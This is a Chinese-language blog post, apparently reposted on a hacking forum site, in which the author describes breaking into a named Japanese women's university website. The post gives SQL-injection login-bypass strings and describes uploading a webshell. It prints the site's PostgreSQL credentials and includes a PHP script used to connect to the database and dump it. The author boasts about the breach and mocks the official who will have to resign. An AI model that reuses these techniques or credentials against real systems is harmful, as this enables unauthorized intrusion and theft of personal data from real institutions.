黑客入侵日本共立女子大学技术分析

浏览:
字体:
发布时间:2015-09-06 13:11:02
来源:

共立女子大学的网站是http://www.kyoritsu-wu.ac.jp
先是摸索这个网站的结构,Apache+php+Redhat,只能看出这么多,静态页面应该是真的。至于数据库,不能确定是MySQL。
刚开始也没想到是PostgreSQL,只不过一开始好像有个直觉。
大体看了下页面,然后用谷歌site语句搜索了一下

  1. site:www.kyoritsu-wu.ac.jp inurl:.php?

复制代码 
就几个页面而已,看了下也没什么用途。不过443端口开放
开始换衣后台在其他端口,例如443端口

  1. https://www.kyoritsu-wu.ac.jp

复制代码 
或者有什么二级域名什么的的。
不过好像搜不到这个网站的二级域名。
其实最意外的是,后台暴弱,为什么我就不具体说了,后台地址嘛过几天放出。我使用

  1. admin'or'1'='1

  2. 'or'1'='1

复制代码 
居然登陆了后台
虽然看不懂后台文字,不过“上传”还是看得懂的,webshell毫无压力



当然,这里不是正文。正文是,我找到了数据库配置文件,居然连不上数据库。
因为发现了phpPGAdmin,但是用这个也连不上

  1. http://www.kyoritsu-wu.ac.jp/pgadmin/admin/

复制代码 
我就纳闷了,5432端口明明开放,为什么连接不上呢?



可能是pgadmin没配置好?自己写个程序试试?

  1. <?php

  2. $dbconn = pg_connect("host=localhost port=5432 dbname=cms_db user=postgres password=6ewgt39c")

  3. or die('悲剧'.pg_last_error());

  4. pg_query('set client_encoding=UTF8');

  5. $query ='select datname from pg_database;';

  6. $result= pg_query($query) or die( '又悲剧:'.pg_last_error());

  7. while ($result && $line = pg_fetch_array($result))

  8. {

  9. echo $line['wbtitle']."<br/>";

  10. }

  11. pg_free_result($result);

  12. pg_close($dbconn);

  13. ?>

复制代码 
写了段脚本,如上访问,直接就悲剧了,根本连不上。



再回去看看配置信息没错啊,于是问了下核心开发群里的Juliet,她说很其实解决起来很简单
5432端口开放,PostgreSQL程序运行,配置正确,但是php无法连接的情况,只要把连接语句中的主机和端口去掉连接就可以了
于是写了段PostgreSQL的数据库操作脚本。地址在这里:
http://bbs.blackbap.org/thread-2480-1-1.html



Bingo! 成功。剩下的就是脱数据了 :-)
又一个负责人过几天要引咎辞职了 :-(

总结一下:看本文标题就知道我不是在讲入侵手法了,本文主要为解决脱裤时遇到PostgreSQL无法连接的问题,也就是本文加粗的字体部分。

 

更多信息来自东方联盟网:http://www.vm888.com

>更多相关文章
24小时热门资讯
24小时回复排行
资讯 | QQ | 安全 | 编程 | 数据库 | 系统 | 网络 | 考试 | 站长 | 关于东联 | 安全雇佣 | 搞笑视频大全 | 微信学院 | 视频课程 |
关于我们 | 联系我们 | 广告服务 | 免责申明 | 作品发布 | 网站地图 | 官方微博 | 技术培训
Copyright © 2007 - 2024 Vm888.Com. All Rights Reserved
粤公网安备 44060402001498号 粤ICP备19097316号 请遵循相关法律法规
');})();